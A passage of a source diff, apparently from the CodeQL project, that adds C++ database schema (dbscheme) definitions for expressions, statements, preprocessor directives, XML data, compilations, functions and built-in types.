131 @objc_dictionary_literal deprecated +| 132 = @foldexpr +// ... +| 200 = @ctordirectinit +| 201 = @ctorvirtualinit +| 202 = @ctorfieldinit +| 203 = @ctordelegatinginit +| 204 = @dtordirectdestruct +| 205 = @dtorvirtualdestruct +| 206 = @dtorfielddestruct +// ... +| 210 = @static_cast +| 211 = @reinterpret_cast +| 212 = @const_cast +| 213 = @dynamic_cast +| 214 = @c_style_cast +| 215 = @lambdaexpr +| 216 = @param_ref +| 217 = @noopexpr +// ... +| 294 = @istriviallyconstructibleexpr +| 295 = @isdestructibleexpr +| 296 = @isnothrowdestructibleexpr +| 297 = @istriviallydestructibleexpr +| 298 = @istriviallyassignableexpr +| 299 = @isnothrowassignableexpr +| 300 = @istrivialexpr +| 301 = @isstandardlayoutexpr +| 302 = @istriviallycopyableexpr +| 303 = @isliteraltypeexpr +| 304 = @hastrivialmoveconstructorexpr +| 305 = @hastrivialmoveassignexpr +| 306 = @hasnothrowmoveassignexpr +| 307 = @isconstructibleexpr +| 308 = @isnothrowconstructibleexpr +| 309 = @hasfinalizerexpr +| 310 = @isdelegateexpr +| 311 = @isinterfaceclassexpr +| 312 = @isrefarrayexpr +| 313 = @isrefclassexpr +| 314 = @issealedexpr +| 315 = @issimplevalueclassexpr +| 316 = @isvalueclassexpr +| 317 = @isfinalexpr +| 319 = @noexceptexpr +| 320 = @builtinshufflevector +| 321 = @builtinchooseexpr +| 322 = @builtinaddressof +| 323 = @vec_fill +| 324 = @builtinconvertvector +| 325 = @builtincomplex +| 326 = @spaceshipexpr +| 327 = @co_await +| 328 = @co_yield +| 329 = @temp_init +| 330 = @isassignable +| 331 = @isaggregate +| 332 = @hasuniqueobjectrepresentations +| 333 = @builtinbitcast +| 334 = @builtinshuffle +| 335 = @blockassignexpr +| 336 = @issame +| 337 = @isfunction +| 338 = @islayoutcompatible +| 339 = @ispointerinterconvertiblebaseof +| 340 = @isarray +| 341 = @arrayrank +| 342 = @arrayextent +| 343 = @isarithmetic +| 344 = @iscompletetype +| 345 = @iscompound +| 346 = @isconst +| 347 = @isfloatingpoint +| 348 = @isfundamental +| 349 = @isintegral +| 350 = @islvaluereference +| 351 = 
@ismemberfunctionpointer +| 352 = @ismemberobjectpointer +| 353 = @ismemberpointer +| 354 = @isobject +| 355 = @ispointer +| 356 = @isreference +| 357 = @isrvaluereference +| 358 = @isscalar +| 359 = @issigned +| 360 = @isunsigned +| 361 = @isvoid +| 362 = @isvolatile +| 363 = @reuseexpr +| 364 = @istriviallycopyassignable +| 365 = @isassignablenopreconditioncheck +| 366 = @referencebindstotemporary +| 367 = @issameas +| 368 = @builtinhasattribute +| 369 = @ispointerinterconvertiblewithclass +| 370 = @builtinispointerinterconvertiblewithclass +| 371 = @iscorrespondingmember +| 372 = @builtiniscorrespondingmember +| 373 = @isboundedarray +| 374 = @isunboundedarray +| 375 = @isreferenceable +| 378 = @isnothrowconvertible +| 379 = @referenceconstructsfromtemporary +| 380 = @referenceconvertsfromtemporary +| 381 = @isconvertible +| 382 = @isvalidwinrttype +| 383 = @iswinclass +| 384 = @iswininterface +| 385 = @istriviallyequalitycomparable +| 386 = @isscopedenum +| 387 = @istriviallyrelocatable +| 388 = @datasizeof +| 389 = @c11_generic +| 390 = @requires_expr +| 391 = @nested_requirement +| 392 = @compound_requirement +| 393 = @concept_id +| 394 = @isinvocable +| 395 = @isnothrowinvocable +| 396 = @isbitwisecloneable +; + +@var_args_expr = @vastartexpr + | @vaendexpr + | @vaargexpr + | @vacopyexpr + ; + +@builtin_op = @var_args_expr + | @noopexpr + | @offsetofexpr + | @intaddrexpr + | @hasassignexpr + | @hascopyexpr + | @hasnothrowassign + | @hasnothrowconstr + | @hasnothrowcopy + | @hastrivialassign + | @hastrivialconstr + | @hastrivialcopy + | @hastrivialdestructor + | @hasuserdestr + | @hasvirtualdestr + | @isabstractexpr + | @isbaseofexpr + | @isclassexpr + | @isconvtoexpr + | @isemptyexpr + | @isenumexpr + | @ispodexpr + | @ispolyexpr + | @isunionexpr + | @typescompexpr + | @builtinshufflevector + | @builtinconvertvector + | @builtinaddressof + | @istriviallyconstructibleexpr + | @isdestructibleexpr + | @isnothrowdestructibleexpr + | @istriviallydestructibleexpr 
+ | @istriviallyassignableexpr + | @isnothrowassignableexpr + | @istrivialexpr + | @isstandardlayoutexpr + | @istriviallycopyableexpr + | @isliteraltypeexpr + | @hastrivialmoveconstructorexpr + | @hastrivialmoveassignexpr + | @hasnothrowmoveassignexpr + | @isconstructibleexpr + | @isnothrowconstructibleexpr + | @hasfinalizerexpr + | @isdelegateexpr + | @isinterfaceclassexpr + | @isrefarrayexpr + | @isrefclassexpr + | @issealedexpr + | @issimplevalueclassexpr + | @isvalueclassexpr + | @isfinalexpr + | @builtinchooseexpr + | @builtincomplex + | @isassignable + | @isaggregate + | @hasuniqueobjectrepresentations + | @builtinbitcast + | @builtinshuffle + | @issame + | @isfunction + | @islayoutcompatible + | @ispointerinterconvertiblebaseof + | @isarray + | @arrayrank + | @arrayextent + | @isarithmetic + | @iscompletetype + | @iscompound + | @isconst + | @isfloatingpoint + | @isfundamental + | @isintegral + | @islvaluereference + | @ismemberfunctionpointer + | @ismemberobjectpointer + | @ismemberpointer + | @isobject + | @ispointer + | @isreference + | @isrvaluereference + | @isscalar + | @issigned + | @isunsigned + | @isvoid + | @isvolatile + | @istriviallycopyassignable + | @isassignablenopreconditioncheck + | @referencebindstotemporary + | @issameas + | @builtinhasattribute + | @ispointerinterconvertiblewithclass + | @builtinispointerinterconvertiblewithclass + | @iscorrespondingmember + | @builtiniscorrespondingmember + | @isboundedarray + | @isunboundedarray + | @isreferenceable + | @isnothrowconvertible + | @referenceconstructsfromtemporary + | @referenceconvertsfromtemporary + | @isconvertible + | @isvalidwinrttype + | @iswinclass + | @iswininterface + | @istriviallyequalitycomparable + | @isscopedenum + | @istriviallyrelocatable + | @isinvocable + | @isnothrowinvocable + | @isbitwisecloneable + ; + +compound_requirement_is_noexcept( + int expr: @compound_requirement ref +); + +new_allocated_type( + unique int expr: @new_expr ref, + int type_id: @type ref +); + 
+new_array_allocated_type( + unique int expr: @new_array_expr ref, + int type_id: @type ref +); + +param_ref_to_this( + int expr: @param_ref ref +) + +/** + * The field being initialized by an initializer expression within an aggregate + * initializer for a class/struct/union. Position is used to sort repeated initializers. + */ +#keyset[aggregate, position] +aggregate_field_init( + int aggregate: @aggregateliteral ref, + int initializer: @expr ref, + int field: @membervariable ref, + int position: int ref, + boolean is_designated: boolean ref +); + +/** + * The index of the element being initialized by an initializer expression + * within an aggregate initializer for an array. Position is used to sort repeated initializers. + */ +#keyset[aggregate, position] +aggregate_array_init( + int aggregate: @aggregateliteral ref, + int initializer: @expr ref, + int element_index: int ref, + int position: int ref, + boolean is_designated: boolean ref +); + +@ctorinit = @ctordirectinit + | @ctorvirtualinit + | @ctorfieldinit + | @ctordelegatinginit; +@dtordestruct = @dtordirectdestruct + | @dtorvirtualdestruct + | @dtorfielddestruct; + + +condition_decl_bind( + unique int expr: @condition_decl ref, + unique int decl: @declaration ref +); + +typeid_bind( + unique int expr: @type_id ref, + int type_id: @type ref +); + +uuidof_bind( + unique int expr: @uuidof ref, + int type_id: @type ref +); + +@sizeof_or_alignof = @runtime_sizeof | @runtime_alignof | @datasizeof | @sizeof_pack; + +sizeof_bind( + unique int expr: @sizeof_or_alignof ref, + int type_id: @type ref +); + +code_block( + unique int block: @literal ref, + unique int routine: @function ref +); + +lambdas( + unique int expr: @lambdaexpr ref, + string default_capture: string ref, + boolean has_explicit_return_type: boolean ref, + boolean has_explicit_parameter_list: boolean ref +); + +lambda_capture( + unique int id: @lambdacapture, + int lambda: @lambdaexpr ref, + int index: int ref, + int field: @membervariable ref, + 
boolean captured_by_reference: boolean ref, + boolean is_implicit: boolean ref, + int location: @location_default ref +); + +@funbindexpr = @routineexpr + | @new_expr + | @delete_expr + | @delete_array_expr + | @ctordirectinit + | @ctorvirtualinit + | @ctordelegatinginit + | @dtordirectdestruct + | @dtorvirtualdestruct; + +@varbindexpr = @varaccess | @ctorfieldinit | @dtorfielddestruct; +@addressable = @function | @variable ; +@accessible = @addressable | @enumconstant ; + +@access = @varaccess | @routineexpr ; + +fold( + int expr: @foldexpr ref, + string operator: string ref, + boolean is_left_fold: boolean ref +); + +stmts( + unique int id: @stmt, + int kind: int ref, + int location: @location_default ref +); + +case @stmt.kind of + 1 = @stmt_expr +| 2 = @stmt_if +| 3 = @stmt_while +| 4 = @stmt_goto +| 5 = @stmt_label +| 6 = @stmt_return +| 7 = @stmt_block +| 8 = @stmt_end_test_while // do { ... } while ( ... ) +| 9 = @stmt_for +| 10 = @stmt_switch_case +| 11 = @stmt_switch +| 13 = @stmt_asm // "asm" statement or the body of an asm function +| 15 = @stmt_try_block +| 16 = @stmt_microsoft_try // Microsoft +| 17 = @stmt_decl +| 18 = @stmt_set_vla_size // C99 +| 19 = @stmt_vla_decl // C99 +| 25 = @stmt_assigned_goto // GNU +| 26 = @stmt_empty +| 27 = @stmt_continue +| 28 = @stmt_break +| 29 = @stmt_range_based_for // C++11 +// ... 30 @stmt_at_autoreleasepool_block deprecated +// ... 31 @stmt_objc_for_in deprecated +// ... 32 @stmt_at_synchronized deprecated +| 33 = @stmt_handler +// ... 
34 @stmt_finally_end deprecated +| 35 = @stmt_constexpr_if +| 37 = @stmt_co_return +| 38 = @stmt_consteval_if +| 39 = @stmt_not_consteval_if +| 40 = @stmt_leave +; + +type_vla( + int type_id: @type ref, + int decl: @stmt_vla_decl ref +); + +variable_vla( + int var: @variable ref, + int decl: @stmt_vla_decl ref +); + +type_is_vla(unique int type_id: @derivedtype ref) + +if_initialization( + unique int if_stmt: @stmt_if ref, + int init_id: @stmt ref +); + +if_then( + unique int if_stmt: @stmt_if ref, + int then_id: @stmt ref +); + +if_else( + unique int if_stmt: @stmt_if ref, + int else_id: @stmt ref +); + +constexpr_if_initialization( + unique int constexpr_if_stmt: @stmt_constexpr_if ref, + int init_id: @stmt ref +); + +constexpr_if_then( + unique int constexpr_if_stmt: @stmt_constexpr_if ref, + int then_id: @stmt ref +); + +constexpr_if_else( + unique int constexpr_if_stmt: @stmt_constexpr_if ref, + int else_id: @stmt ref +); + +@stmt_consteval_or_not_consteval_if = @stmt_consteval_if | @stmt_not_consteval_if; + +consteval_if_then( + unique int constexpr_if_stmt: @stmt_consteval_or_not_consteval_if ref, + int then_id: @stmt ref +); + +consteval_if_else( + unique int constexpr_if_stmt: @stmt_consteval_or_not_consteval_if ref, + int else_id: @stmt ref +); + +while_body( + unique int while_stmt: @stmt_while ref, + int body_id: @stmt ref +); + +do_body( + unique int do_stmt: @stmt_end_test_while ref, + int body_id: @stmt ref +); + +switch_initialization( + unique int switch_stmt: @stmt_switch ref, + int init_id: @stmt ref +); + +#keyset[switch_stmt, index] +switch_case( + int switch_stmt: @stmt_switch ref, + int index: int ref, + int case_id: @stmt_switch_case ref +); + +switch_body( + unique int switch_stmt: @stmt_switch ref, + int body_id: @stmt ref +); + +@stmt_for_or_range_based_for = @stmt_for + | @stmt_range_based_for; + +for_initialization( + unique int for_stmt: @stmt_for_or_range_based_for ref, + int init_id: @stmt ref +); + +for_condition( + unique int 
for_stmt: @stmt_for ref, + int condition_id: @expr ref +); + +for_update( + unique int for_stmt: @stmt_for ref, + int update_id: @expr ref +); + +for_body( + unique int for_stmt: @stmt_for ref, + int body_id: @stmt ref +); + +@stmtparent = @stmt | @expr_stmt ; +stmtparents( + unique int id: @stmt ref, + int index: int ref, + int parent: @stmtparent ref +); + +ishandler(unique int block: @stmt_block ref); + +@cfgnode = @stmt | @expr | @function | @initialiser ; + +stmt_decl_bind( + int stmt: @stmt_decl ref, + int num: int ref, + int decl: @declaration ref +); + +stmt_decl_entry_bind( + int stmt: @stmt_decl ref, + int num: int ref, + int decl_entry: @element ref +); + +@parameterized_element = @function | @stmt_block | @requires_expr; + +blockscope( + unique int block: @stmt_block ref, + int enclosing: @parameterized_element ref +); + +@jump = @stmt_goto | @stmt_break | @stmt_continue | @stmt_leave; + +@jumporlabel = @jump | @stmt_label | @literal; + +jumpinfo( + unique int id: @jumporlabel ref, + string str: string ref, + int target: @stmt ref +); + +preprocdirects( + unique int id: @preprocdirect, + int kind: int ref, + int location: @location_default ref +); +case @preprocdirect.kind of + 0 = @ppd_if +| 1 = @ppd_ifdef +| 2 = @ppd_ifndef +| 3 = @ppd_elif +| 4 = @ppd_else +| 5 = @ppd_endif +| 6 = @ppd_plain_include +| 7 = @ppd_define +| 8 = @ppd_undef +| 9 = @ppd_line +| 10 = @ppd_error +| 11 = @ppd_pragma +| 12 = @ppd_objc_import +| 13 = @ppd_include_next +| 14 = @ppd_ms_import +| 15 = @ppd_elifdef +| 16 = @ppd_elifndef +| 17 = @ppd_embed +| 18 = @ppd_warning +; + +@ppd_include = @ppd_plain_include | @ppd_objc_import | @ppd_include_next | @ppd_ms_import; + +@ppd_branch = @ppd_if | @ppd_ifdef | @ppd_ifndef | @ppd_elif | @ppd_elifdef | @ppd_elifndef; + +preprocpair( + int begin : @ppd_branch ref, + int elseelifend : @preprocdirect ref +); + +preproctrue(int branch : @ppd_branch ref); +preprocfalse(int branch : @ppd_branch ref); + +preproctext( + unique int id: 
@preprocdirect ref, + string head: string ref, + string body: string ref +); + +includes( + unique int id: @ppd_include ref, + int included: @file ref +); + +embeds( + unique int id: @ppd_embed ref, + int included: @file ref +); + +link_targets( + int id: @link_target, + int binary: @file ref +); + +link_parent( + int element : @element ref, + int link_target : @link_target ref +); + +/*- Database metadata -*/ + +/** + * The CLI will automatically emit applicable tuples for this table, + * such as `databaseMetadata("isOverlay", "true")` when building an + * overlay database. + */ +databaseMetadata( + string metadataKey: string ref, + string value: string ref +); + +/*- Overlay support -*/ + +/** + * The CLI will automatically emit tuples for each new/modified/deleted file + * when building an overlay database. + */ +overlayChangedFiles( + string path: string ref +); + +/*- XML Files -*/ + +xmlEncoding( + unique int id: @file ref, + string encoding: string ref +); + +xmlDTDs( + unique int id: @xmldtd, + string root: string ref, + string publicId: string ref, + string systemId: string ref, + int fileid: @file ref +); + +xmlElements( + unique int id: @xmlelement, + string name: string ref, + int parentid: @xmlparent ref, + int idx: int ref, + int fileid: @file ref +); + +xmlAttrs( + unique int id: @xmlattribute, + int elementid: @xmlelement ref, + string name: string ref, + string value: string ref, + int idx: int ref, + int fileid: @file ref +); + +xmlNs( + int id: @xmlnamespace, + string prefixName: string ref, + string URI: string ref, + int fileid: @file ref +); + +xmlHasNs( + int elementId: @xmlnamespaceable ref, + int nsId: @xmlnamespace ref, + int fileid: @file ref +); + +xmlComments( + unique int id: @xmlcomment, + string text: string ref, + int parentid: @xmlparent ref, + int fileid: @file ref +); + +xmlChars( + unique int id: @xmlcharacters, + string text: string ref, + int parentid: @xmlparent ref, + int idx: int ref, + int isCDATA: int ref, + int fileid: 
@file ref +); + +@xmlparent = @file | @xmlelement; +@xmlnamespaceable = @xmlelement | @xmlattribute; + +xmllocations( + int xmlElement: @xmllocatable ref, + int location: @location_default ref +); + +@xmllocatable = @xmlcharacters | @xmlelement | @xmlcomment | @xmlattribute | @xmldtd | @file | @xmlnamespace; diff --git a/cpp/ql/lib/upgrades/ef8d209a22e27413aaaeff4446f0ecb9fa2c227b/semmlecode.cpp.dbscheme b/cpp/ql/lib/upgrades/ef8d209a22e27413aaaeff4446f0ecb9fa2c227b/semmlecode.cpp.dbscheme new file mode 100644 index 000000000000..0853f43dc8c0 --- /dev/null +++ b/cpp/ql/lib/upgrades/ef8d209a22e27413aaaeff4446f0ecb9fa2c227b/semmlecode.cpp.dbscheme 
@@ -0,0 +1,2578 @@ + +/*- Compilations -*/ + +/** + * An invocation of the compiler. Note that more than one file may be + * compiled per invocation. For example, this command compiles three + * source files: + * + * gcc -c f1.c f2.c f3.c + * + * The `id` simply identifies the invocation, while `cwd` is the working + * directory from which the compiler was invoked. + */ +compilations( + /** + * An invocation of the compiler. Note that more than one file may + * be compiled per invocation. For example, this command compiles + * three source files: + * + * gcc -c f1.c f2.c f3.c + */ + unique int id : @compilation, + string cwd : string ref +); + +/** + * The arguments that were passed to the extractor for a compiler + * invocation. If `id` is for the compiler invocation + * + * gcc -c f1.c f2.c f3.c + * + * then typically there will be rows for + * + * num | arg + * --- | --- + * 0 | *path to extractor* + * 1 | `--mimic` + * 2 | `/usr/bin/gcc` + * 3 | `-c` + * 4 | f1.c + * 5 | f2.c + * 6 | f3.c + */ +#keyset[id, num] +compilation_args( + int id : @compilation ref, + int num : int ref, + string arg : string ref +); + +/** + * The expanded arguments that were passed to the extractor for a + * compiler invocation. This is similar to `compilation_args`, but + * for a `@someFile` argument, it includes the arguments from that + * file, rather than just taking the argument literally. + */ +#keyset[id, num] +compilation_expanded_args( + int id : @compilation ref, + int num : int ref, + string arg : string ref +); + +/** + * Optionally, record the build mode for each compilation. + */ +compilation_build_mode( + unique int id : @compilation ref, + int mode : int ref +); + +/* +case @compilation_build_mode.mode of + 0 = @build_mode_none +| 1 = @build_mode_manual +| 2 = @build_mode_auto +; +*/ + +/** + * The source files that are compiled by a compiler invocation. 
+ * If `id` is for the compiler invocation + * + * gcc -c f1.c f2.c f3.c + * + * then there will be rows for + * + * num | arg + * --- | --- + * 0 | f1.c + * 1 | f2.c + * 2 | f3.c + * + * Note that even if those files `#include` headers, those headers + * do not appear as rows. + */ +#keyset[id, num] +compilation_compiling_files( + int id : @compilation ref, + int num : int ref, + int file : @file ref +); + +/** + * The time taken by the extractor for a compiler invocation. + * + * For each file `num`, there will be rows for + * + * kind | seconds + * ---- | --- + * 1 | CPU seconds used by the extractor frontend + * 2 | Elapsed seconds during the extractor frontend + * 3 | CPU seconds used by the extractor backend + * 4 | Elapsed seconds during the extractor backend + */ +#keyset[id, num, kind] +compilation_time( + int id : @compilation ref, + int num : int ref, + /* kind: + 1 = frontend_cpu_seconds + 2 = frontend_elapsed_seconds + 3 = extractor_cpu_seconds + 4 = extractor_elapsed_seconds + */ + int kind : int ref, + float seconds : float ref +); + +/** + * An error or warning generated by the extractor. + * The diagnostic message `diagnostic` was generated during compiler + * invocation `compilation`, and is the `file_number_diagnostic_number`th + * message generated while extracting the `file_number`th file of that + * invocation. + */ +#keyset[compilation, file_number, file_number_diagnostic_number] +diagnostic_for( + int diagnostic : @diagnostic ref, + int compilation : @compilation ref, + int file_number : int ref, + int file_number_diagnostic_number : int ref +); + +/** + * If extraction was successful, then `cpu_seconds` and + * `elapsed_seconds` are the CPU time and elapsed time (respectively) + * that extraction took for compiler invocation `id`. 
+ */ +compilation_finished( + unique int id : @compilation ref, + float cpu_seconds : float ref, + float elapsed_seconds : float ref +); + +/*- External data -*/ + +/** + * External data, loaded from CSV files during snapshot creation. See + * [Tutorial: Incorporating external data](https://help.semmle.com/wiki/display/SD/Tutorial%3A+Incorporating+external+data) + * for more information. + */ +externalData( + int id : @externalDataElement, + string path : string ref, + int column: int ref, + string value : string ref +); + +/*- Source location prefix -*/ + +/** + * The source location of the snapshot. + */ +sourceLocationPrefix(string prefix : string ref); + +/*- Files and folders -*/ + +/** + * The location of an element. + * The location spans column `startcolumn` of line `startline` to + * column `endcolumn` of line `endline` in file `file`. + * For more information, see + * [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). + */ +locations_default( + unique int id: @location_default, + int file: @file ref, + int beginLine: int ref, + int beginColumn: int ref, + int endLine: int ref, + int endColumn: int ref +); + +files( + unique int id: @file, + string name: string ref +); + +folders( + unique int id: @folder, + string name: string ref +); + +@container = @file | @folder + +containerparent( + int parent: @container ref, + unique int child: @container ref +); + +/*- Lines of code -*/ + +numlines( + int element_id: @sourceline ref, + int num_lines: int ref, + int num_code: int ref, + int num_comment: int ref +); + +/*- Diagnostic messages -*/ + +diagnostics( + unique int id: @diagnostic, + int severity: int ref, + string error_tag: string ref, + string error_message: string ref, + string full_error_message: string ref, + int location: @location_default ref +); + +/*- C++ dbscheme -*/ + +extractor_version( + string codeql_version: string ref, + string frontend_version: string ref +) + +/** + * Gives the TRAP 
filename that `trap` is associated with. + * For debugging only. + */ +trap_filename( + int trap: @trap, + string filename: string ref +); + +/** + * Gives the tag name for `tag`. + * For debugging only. + */ +tag_name( + int tag: @tag, + string name: string ref +); + +@trap_or_tag = @tag | @trap; + +/** + * Gives the name for the source file. + */ +source_file_name( + int sf: @source_file, + string name: string ref +); + +/** + * In `build-mode: none` overlay mode, indicates that `source_file` + * (`/path/to/foo.c`) uses the TRAP file `trap_file`; i.e. it is the + * TRAP file corresponding to `foo.c`, something it transitively + * includes, or a template instantiation it transitively uses. + */ +source_file_uses_trap( + int source_file: @source_file ref, + int trap_file: @trap ref +); + +/** + * In `build-mode: none` overlay mode, indicates that the TRAP file + * `trap_file` uses tag `tag`. + */ +trap_uses_tag( + int trap_file: @trap ref, + int tag: @tag ref +); + +/** + * Holds if there is a definition of `element` in TRAP file or tag `t`. + */ +in_trap_or_tag( + int element: @element ref, + int t: @trap_or_tag ref +); + +pch_uses( + int pch: @pch ref, + int compilation: @compilation ref, + int id: @file ref +) + +#keyset[pch, compilation] +pch_creations( + int pch: @pch, + int compilation: @compilation ref, + int from: @file ref +) + +/** An element for which line-count information is available. 
*/ +@sourceline = @file | @function | @variable | @enumconstant | @xmllocatable; + +fileannotations( + int id: @file ref, + int kind: int ref, + string name: string ref, + string value: string ref +); + +inmacroexpansion( + int id: @element ref, + int inv: @macroinvocation ref +); + +affectedbymacroexpansion( + int id: @element ref, + int inv: @macroinvocation ref +); + +case @macroinvocation.kind of + 1 = @macro_expansion +| 2 = @other_macro_reference +; + +macroinvocations( + unique int id: @macroinvocation, + int macro_id: @ppd_define ref, + int location: @location_default ref, + int kind: int ref +); + +macroparent( + unique int id: @macroinvocation ref, + int parent_id: @macroinvocation ref +); + +// a macroinvocation may be part of another location +// the way to find a constant expression that uses a macro +// is thus to find a constant expression that has a location +// to which a macro invocation is bound +macrolocationbind( + int id: @macroinvocation ref, + int location: @location_default ref +); + +#keyset[invocation, argument_index] +macro_argument_unexpanded( + int invocation: @macroinvocation ref, + int argument_index: int ref, + string text: string ref +); + +#keyset[invocation, argument_index] +macro_argument_expanded( + int invocation: @macroinvocation ref, + int argument_index: int ref, + string text: string ref +); + +case @function.kind of + 0 = @unknown_function +| 1 = @normal_function +| 2 = @constructor +| 3 = @destructor +| 4 = @conversion_function +| 5 = @operator +// ... 6 = @builtin_function deprecated // GCC built-in functions, e.g. 
__builtin___memcpy_chk +| 7 = @user_defined_literal +| 8 = @deduction_guide +; + +functions( + unique int id: @function, + string name: string ref, + int kind: int ref +); + +builtin_functions( + int id: @function ref +) + +function_entry_point( + int id: @function ref, + unique int entry_point: @stmt ref +); + +function_return_type( + int id: @function ref, + int return_type: @type ref +); + +/** + * If `function` is a coroutine, then this gives the `std::experimental::resumable_traits` + * instance associated with it, and the variables representing the `handle` and `promise` + * for it. + */ +coroutine( + unique int function: @function ref, + int traits: @type ref +); + +/* +case @coroutine_placeholder_variable.kind of + 1 = @handle +| 2 = @promise +| 3 = @init_await_resume +; +*/ + +coroutine_placeholder_variable( + unique int placeholder_variable: @variable ref, + int kind: int ref, + int function: @function ref +) + +/** The `new` function used for allocating the coroutine state, if any. */ +coroutine_new( + unique int function: @function ref, + int new: @function ref +); + +/** The `delete` function used for deallocating the coroutine state, if any. 
*/ +coroutine_delete( + unique int function: @function ref, + int delete: @function ref +); + +purefunctions(unique int id: @function ref); + +function_deleted(unique int id: @function ref); + +function_defaulted(unique int id: @function ref); + +function_prototyped(unique int id: @function ref) + +deduction_guide_for_class( + int id: @function ref, + int class_template: @usertype ref +) + +member_function_this_type( + unique int id: @function ref, + int this_type: @type ref +); + +#keyset[id, type_id] +fun_decls( + int id: @fun_decl, + int function: @function ref, + int type_id: @type ref, + string name: string ref, + int location: @location_default ref +); +fun_def(unique int id: @fun_decl ref); +fun_specialized(unique int id: @fun_decl ref); +fun_implicit(unique int id: @fun_decl ref); +fun_decl_specifiers( + int id: @fun_decl ref, + string name: string ref +) +#keyset[fun_decl, index] +fun_decl_throws( + int fun_decl: @fun_decl ref, + int index: int ref, + int type_id: @type ref +); +/* an empty throw specification is different from none */ +fun_decl_empty_throws(unique int fun_decl: @fun_decl ref); +fun_decl_noexcept( + int fun_decl: @fun_decl ref, + int constant: @expr ref +); +fun_decl_empty_noexcept(int fun_decl: @fun_decl ref); +fun_decl_typedef_type( + unique int fun_decl: @fun_decl ref, + int typedeftype_id: @usertype ref +); + +/* +case @fun_requires.kind of + 1 = @template_attached +| 2 = @function_attached +; +*/ + +fun_requires( + int id: @fun_decl ref, + int kind: int ref, + int constraint: @expr ref +); + +param_decl_bind( + unique int id: @var_decl ref, + int index: int ref, + int fun_decl: @fun_decl ref +); + +#keyset[id, type_id] +var_decls( + int id: @var_decl, + int variable: @variable ref, + int type_id: @type ref, + string name: string ref, + int location: @location_default ref +); +var_def(unique int id: @var_decl ref); +var_specialized(int id: @var_decl ref); +var_decl_specifiers( + int id: @var_decl ref, + string name: string ref +) 
+is_structured_binding(unique int id: @variable ref); +var_requires( + int id: @var_decl ref, + int constraint: @expr ref +); + +type_decls( + unique int id: @type_decl, + int type_id: @type ref, + int location: @location_default ref +); +type_def(unique int id: @type_decl ref); +type_decl_top( + unique int type_decl: @type_decl ref +); +type_requires( + int id: @type_decl ref, + int constraint: @expr ref +); + +namespace_decls( + unique int id: @namespace_decl, + int namespace_id: @namespace ref, + int location: @location_default ref, + int bodylocation: @location_default ref +); + +case @using.kind of + 1 = @using_declaration +| 2 = @using_directive +| 3 = @using_enum_declaration +; + +usings( + unique int id: @using, + int element_id: @element ref, + int location: @location_default ref, + int kind: int ref +); + +/** The element which contains the `using` declaration. */ +using_container( + int parent: @element ref, + int child: @using ref +); + +static_asserts( + unique int id: @static_assert, + int condition : @expr ref, + string message : string ref, + int location: @location_default ref, + int enclosing : @element ref +); + +// each function has an ordered list of parameters +#keyset[id, type_id] +#keyset[function, index, type_id] +params( + int id: @parameter, + int function: @parameterized_element ref, + int index: int ref, + int type_id: @type ref +); + +overrides( + int new: @function ref, + int old: @function ref +); + +#keyset[id, type_id] +membervariables( + int id: @membervariable, + int type_id: @type ref, + string name: string ref +); + +#keyset[id, type_id] +globalvariables( + int id: @globalvariable, + int type_id: @type ref, + string name: string ref +); + +#keyset[id, type_id] +localvariables( + int id: @localvariable, + int type_id: @type ref, + string name: string ref +); + +autoderivation( + unique int var: @variable ref, + int derivation_type: @type ref +); + +orphaned_variables( + int var: @localvariable ref, + int function: @function ref 
+) + +enumconstants( + unique int id: @enumconstant, + int parent: @usertype ref, + int index: int ref, + int type_id: @type ref, + string name: string ref, + int location: @location_default ref +); + +@variable = @localscopevariable | @globalvariable | @membervariable; + +@localscopevariable = @localvariable | @parameter; + +/** + * Built-in types are the fundamental types, e.g., integral, floating, and void. + */ +case @builtintype.kind of + 1 = @errortype +| 2 = @unknowntype +| 3 = @void +| 4 = @boolean +| 5 = @char +| 6 = @unsigned_char +| 7 = @signed_char +| 8 = @short +| 9 = @unsigned_short +| 10 = @signed_short +| 11 = @int +| 12 = @unsigned_int +| 13 = @signed_int +| 14 = @long +| 15 = @unsigned_long +| 16 = @signed_long +| 17 = @long_long +| 18 = @unsigned_long_long +| 19 = @signed_long_long +// ... 20 Microsoft-specific __int8 +// ... 21 Microsoft-specific __int16 +// ... 22 Microsoft-specific __int32 +// ... 23 Microsoft-specific __int64 +| 24 = @float +| 25 = @double +| 26 = @long_double +| 27 = @complex_float // C99-specific _Complex float +| 28 = @complex_double // C99-specific _Complex double +| 29 = @complex_long_double // C99-specific _Complex long double +| 30 = @imaginary_float // C99-specific _Imaginary float +| 31 = @imaginary_double // C99-specific _Imaginary double +| 32 = @imaginary_long_double // C99-specific _Imaginary long double +| 33 = @wchar_t // Microsoft-specific +| 34 = @decltype_nullptr // C++11 +| 35 = @int128 // __int128 +| 36 = @unsigned_int128 // unsigned __int128 +| 37 = @signed_int128 // signed __int128 +| 38 = @float128 // __float128 +| 39 = @complex_float128 // _Complex __float128 +// ... 40 _Decimal32 +// ... 41 _Decimal64 +// ... 42 _Decimal128 +| 43 = @char16_t +| 44 = @char32_t +| 45 = @std_float32 // _Float32 +| 46 = @float32x // _Float32x +| 47 = @std_float64 // _Float64 +| 48 = @float64x // _Float64x +| 49 = @std_float128 // _Float128 +// ... 
50 _Float128x +| 51 = @char8_t +| 52 = @float16 // _Float16 +| 53 = @complex_float16 // _Complex _Float16 +| 54 = @fp16 // __fp16 +| 55 = @std_bfloat16 // __bf16 +| 56 = @std_float16 // std::float16_t +| 57 = @complex_std_float32 // _Complex _Float32 +| 58 = @complex_float32x // _Complex _Float32x +| 59 = @complex_std_float64 // _Complex _Float64 +| 60 = @complex_float64x // _Complex _Float64x +| 61 = @complex_std_float128 // _Complex _Float128 +| 62 = @mfp8 // __mfp8 +| 63 = @scalable_vector_count // __SVCount_t +| 64 = @complex_fp16 // _Complex __fp16 +| 65 = @complex_std_bfloat16 // _Complex __bf16 +| 66 = @complex_std_float16 // _Complex std::float16_t +; + +builtintypes( + unique int id: @builtintype, + string name: string ref, + int kind: int ref, + int size: int ref, + int sign: int ref, + int alignment: int ref +); + +/** + * Derived types are types that are directly derived from existing types and + * point to, refer to, transform type data to return a new type. + */ +case @derivedtype.kind of + 1 = @pointer +| 2 = @reference +| 3 = @type_with_specifiers +| 4 = @array +| 5 = @gnu_vector +| 6 = @routineptr +| 7 = @routinereference +| 8 = @rvalue_reference // C++11 +// ... 9 type_conforming_to_protocols deprecated +| 10 = @block +| 11 = @scalable_vector // Arm SVE +; + +derivedtypes( + unique int id: @derivedtype, + string name: string ref, + int kind: int ref, + int type_id: @type ref +); + 